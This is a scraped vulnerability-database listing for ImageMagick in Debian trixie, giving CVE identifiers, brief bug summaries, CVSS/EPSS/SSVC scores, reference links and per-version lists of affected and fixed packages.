https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://www.openwall.com/lists/oss-security/2023/05/29/1

reference_id

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:23:59Z/

url

https://www.openwall.com/lists/oss-security/2023/05/29/1

reference_url

https://bugzilla.redhat.com/show_bug.cgi?id=2214141

reference_id

2214141

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:23:59Z/

url

https://bugzilla.redhat.com/show_bug.cgi?id=2214141

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/45DUUXYMAEEAW55GSLAXN25VPKCRAIDA/

reference_id

45DUUXYMAEEAW55GSLAXN25VPKCRAIDA

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:23:59Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/45DUUXYMAEEAW55GSLAXN25VPKCRAIDA/

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_id

4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:23:59Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_url

https://github.com/ImageMagick/ImageMagick6/commit/85a370c79afeb45a97842b0959366af5236e9023

reference_id

85a370c79afeb45a97842b0959366af5236e9023

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:23:59Z/

url

https://github.com/ImageMagick/ImageMagick6/commit/85a370c79afeb45a97842b0959366af5236e9023

reference_url

https://access.redhat.com/security/cve/CVE-2023-3195

reference_id

CVE-2023-3195

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:23:59Z/

url

https://access.redhat.com/security/cve/CVE-2023-3195

reference_url

https://github.com/ImageMagick/ImageMagick/commit/f620340935777b28fa3f7b0ed7ed6bd86946934c

reference_id

f620340935777b28fa3f7b0ed7ed6bd86946934c

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:23:59Z/

url

https://github.com/ImageMagick/ImageMagick/commit/f620340935777b28fa3f7b0ed7ed6bd86946934c

reference_url	https://usn.ubuntu.com/6200-1/
reference_id	USN-6200-1
reference_type
scores
url	https://usn.ubuntu.com/6200-1/

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:6.9.12.98%2Bdfsg1-2?distro=trixie
purl	pkg:deb/debian/imagemagick@8:6.9.12.98%2Bdfsg1-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.12.98%252Bdfsg1-2%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2023-3195

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ujad-kteu-sfdu

url VCID-ury3-3x4b-1qh2

vulnerability_id VCID-ury3-3x4b-1qh2

summary ImageMagick: NULL pointer dereference in BenchmarkOpenCLDevices in MagickCore/opencl.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-18210.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-18210.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-18210

reference_id

reference_type

scores

value	0.00319
scoring_system	epss
scoring_elements	0.54824
published_at	2026-04-01T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.54895
published_at	2026-04-02T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.54921
published_at	2026-04-04T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.5489
published_at	2026-04-07T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.5494
published_at	2026-04-08T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.54939
published_at	2026-04-09T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.54952
published_at	2026-04-18T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.54934
published_at	2026-04-12T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.5491
published_at	2026-04-13T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.54948
published_at	2026-04-16T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.5493
published_at	2026-04-21T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.54906
published_at	2026-04-24T12:55:00Z

value	0.00319
scoring_system	epss
scoring_elements	0.54925
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-18210

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1552316
reference_id	1552316
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1552316

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-18210

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ury3-3x4b-1qh2

url VCID-utsb-dc1p-jkcq

vulnerability_id VCID-utsb-dc1p-jkcq

summary ImageMagick: heap-use-after-free in at dcm.c RelinquishDCMMemory

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3962.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3962.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2021-3962

reference_id

reference_type

scores

value	0.00312
scoring_system	epss
scoring_elements	0.54306
published_at	2026-04-01T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54389
published_at	2026-04-26T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54412
published_at	2026-04-21T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54374
published_at	2026-04-24T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54326
published_at	2026-04-02T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54356
published_at	2026-04-04T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54331
published_at	2026-04-07T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54383
published_at	2026-04-08T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54378
published_at	2026-04-09T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54426
published_at	2026-04-16T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54409
published_at	2026-04-12T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.54387
published_at	2026-04-13T12:55:00Z

value	0.00312
scoring_system	epss
scoring_elements	0.5443
published_at	2026-04-18T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2021-3962

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2023196
reference_id	2023196
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2023196

reference_url

https://security.archlinux.org/AVG-2575

reference_id

AVG-2575

reference_type

scores

value	Medium
scoring_system	archlinux
scoring_elements

url

https://security.archlinux.org/AVG-2575

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

